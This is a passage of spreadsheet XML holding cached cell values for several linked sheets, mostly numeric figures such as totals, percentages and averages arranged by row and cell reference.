          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>286</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>342.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3200.13</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>26608.22</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9256.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="4">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>2401</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>35002.0899999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>9</v>
          </cell>
          <cell r="M6">
            <v>28.5</v>
          </cell>
          <cell r="N6">
            <v>4222.42</v>
          </cell>
          <cell r="O6">
            <v>37.5</v>
          </cell>
          <cell r="P6">
            <v>39.5833333333333</v>
          </cell>
          <cell r="Q6">
            <v>52.2059841740851</v>
          </cell>
          <cell r="R6">
            <v>86.7777777777778</v>
          </cell>
          <cell r="S6">
            <v>87.0877192982456</v>
          </cell>
          <cell r="T6">
            <v>86.1671742744682</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>8</v>
          </cell>
          <cell r="M7">
            <v>25.75</v>
          </cell>
          <cell r="N7">
            <v>4048.33</v>
          </cell>
          <cell r="O7">
            <v>33.3333333333333</v>
          </cell>
          <cell r="P7">
            <v>35.7638888888889</v>
          </cell>
          <cell r="Q7">
            <v>50.0535361028684</v>
          </cell>
          <cell r="R7">
            <v>202.5</v>
          </cell>
          <cell r="S7">
            <v>197.514563106796</v>
          </cell>
          <cell r="T7">
            <v>187.634654289547</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>781</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>100</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>302</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>469</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>200</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>2846.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>262</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>4506.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>300</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>2876.68399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>1407</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>429</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>5088.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>400</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>1434.71</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>1620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3263.62</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>42.74</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>85</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>31.117</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>156.25</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>327</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>2780.37</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>26072.6</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>8929.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="5">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>4910</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>36142.8999999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>24</v>
          </cell>
          <cell r="M6">
            <v>52.5</v>
          </cell>
          <cell r="N6">
            <v>4246.42</v>
          </cell>
          <cell r="O6">
            <v>100</v>
          </cell>
          <cell r="P6">
            <v>54.6875</v>
          </cell>
          <cell r="Q6">
            <v>52.3473865877712</v>
          </cell>
          <cell r="R6">
            <v>76.375</v>
          </cell>
          <cell r="S6">
            <v>82.1904761904762</v>
          </cell>
          <cell r="T6">
            <v>86.1118306714833</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>15.25</v>
          </cell>
          <cell r="M7">
            <v>41</v>
          </cell>
          <cell r="N7">
            <v>4063.58</v>
          </cell>
          <cell r="O7">
            <v>63.5416666666667</v>
          </cell>
          <cell r="P7">
            <v>42.7083333333333</v>
          </cell>
          <cell r="Q7">
            <v>50.0934418145957</v>
          </cell>
          <cell r="R7">
            <v>201.770491803279</v>
          </cell>
          <cell r="S7">
            <v>199.09756097561</v>
          </cell>
          <cell r="T7">
            <v>187.687703945782</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1833</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>28</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>274</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>400</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>2446.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>892</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>3614.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>1340</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>1200</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>3016.68399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>737</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>615</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>5210.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>400</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>1034.71</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>3077</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3769.19</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>44.43</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>49</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>26.547</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>254</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>316.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3198.69</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>27529.91</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>8612.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="6">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>2799</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>34496.9899999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>11.75</v>
          </cell>
          <cell r="M6">
            <v>64.25</v>
          </cell>
          <cell r="N6">
            <v>4258.17</v>
          </cell>
          <cell r="O6">
            <v>48.9583333333333</v>
          </cell>
          <cell r="P6">
            <v>53.5416666666667</v>
          </cell>
          <cell r="Q6">
            <v>52.337389380531</v>
          </cell>
          <cell r="R6">
            <v>77.4468085106383</v>
          </cell>
          <cell r="S6">
            <v>81.3229571984436</v>
          </cell>
          <cell r="T6">
            <v>86.0879203977295</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>9.75</v>
          </cell>
          <cell r="M7">
            <v>50.75</v>
          </cell>
          <cell r="N7">
            <v>4073.33</v>
          </cell>
          <cell r="O7">
            <v>40.625</v>
          </cell>
          <cell r="P7">
            <v>42.2916666666667</v>
          </cell>
          <cell r="Q7">
            <v>50.0655113077679</v>
          </cell>
          <cell r="R7">
            <v>193.74358974359</v>
          </cell>
          <cell r="S7">
            <v>198.068965517241</v>
          </cell>
          <cell r="T7">
            <v>187.702199428968</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>910</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>1474</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>1748</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>1273</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>300</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3419.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>355</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>3259.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>300</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>2716.68399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>1742</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>900</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>6052.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>160</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>874.71</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>1889</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4444.91</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>44.43</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>27</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>43.977</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>276</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>330</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3838.91</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>26214</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>8282.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="7">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>5538</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>36357.6599999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>24</v>
          </cell>
          <cell r="M6">
            <v>88.25</v>
          </cell>
          <cell r="N6">
            <v>4282.17</v>
          </cell>
          <cell r="O6">
            <v>100</v>
          </cell>
          <cell r="P6">
            <v>61.2847222222222</v>
          </cell>
          <cell r="Q6">
            <v>52.4775735294118</v>
          </cell>
          <cell r="R6">
            <v>81.9166666666667</v>
          </cell>
          <cell r="S6">
            <v>81.4844192634561</v>
          </cell>
          <cell r="T6">
            <v>86.0645420429362</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>16.25</v>
          </cell>
          <cell r="M7">
            <v>67</v>
          </cell>
          <cell r="N7">
            <v>4089.58</v>
          </cell>
          <cell r="O7">
            <v>67.7083333333333</v>
          </cell>
          <cell r="P7">
            <v>46.5277777777778</v>
          </cell>
          <cell r="Q7">
            <v>50.1174019607843</v>
          </cell>
          <cell r="R7">
            <v>219.815384615385</v>
          </cell>
          <cell r="S7">
            <v>203.34328358209</v>
          </cell>
          <cell r="T7">
            <v>187.829801593318</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1966</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>871</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>400</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>2219</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>500</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>2919.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>515</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>2744.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>737</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>500</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>2953.68399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>1206</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1900</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>5358.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>172</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>702.71</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>3572</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3677.33</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>44.13</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>35</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>53.107</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>343.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>334</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>2999.83</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>28408.67</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>7948.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="8">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>4090</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>36448.7999999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>16.25</v>
          </cell>
          <cell r="M6">
            <v>104.5</v>
          </cell>
          <cell r="N6">
            <v>4298.42</v>
          </cell>
          <cell r="O6">
